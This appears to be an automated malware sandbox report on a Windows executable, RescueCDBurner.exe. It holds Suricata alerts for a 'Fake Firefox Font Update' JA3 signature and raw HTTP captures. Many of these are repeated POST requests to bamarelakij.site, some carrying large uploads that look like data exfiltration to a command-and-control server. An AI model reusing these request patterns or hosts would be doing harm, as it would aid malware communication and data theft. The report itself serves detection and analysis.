Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 4x nop then or byte ptr [edi], dh3_2_6C0D7270
Source: Joe Sandbox ViewIP Address: 131.253.33.203 131.253.33.203
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49726 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50002 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50010 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50021 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50036 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50049 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50060 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50068 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50042 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50075 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50096 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50098 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50094 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50095 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50097 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50100 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50099 -> 104.21.80.52:443
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Content-Length: 147Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 53Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 208Host: bamarelakij.site
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430943703&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3857sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b2?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1BB0012d778c190819b9e701736430946; XID=1BB0012d778c190819b9e701736430946
Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 7.1sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 250sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; MUIDB=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5f98fa1c-3184-4abd-971b-0ba246537bf7; ai_session=nz8yh1TyTd8zxc9wX2nCTq|1736430943700|1736430943700; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z
Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":15,"imageId":"BB1msyCI","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; MUIDB=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5f98fa1c-3184-4abd-971b-0ba246537bf7; ai_session=nz8yh1TyTd8zxc9wX2nCTq|1736430943700|1736430943700; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736430943704&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=91bab7003b9e458fa0272f5f799db4ac&activityId=91bab7003b9e458fa0272f5f799db4ac&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F3117EF083974E1AAB9B33D6E377E4FB&MUID=0196AA9642C66D0E1944BFF943A46C22 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; SM=T
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430945908&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10861sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430945913&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 4757sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430946567&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5391sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430946922&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9892sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Content-Length: 147Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 53Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 683229Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 745Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 212Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 380Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 14825Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 69022Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 35Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 684636Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 745Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 212Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 380Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 14825Host: bamarelakij.site
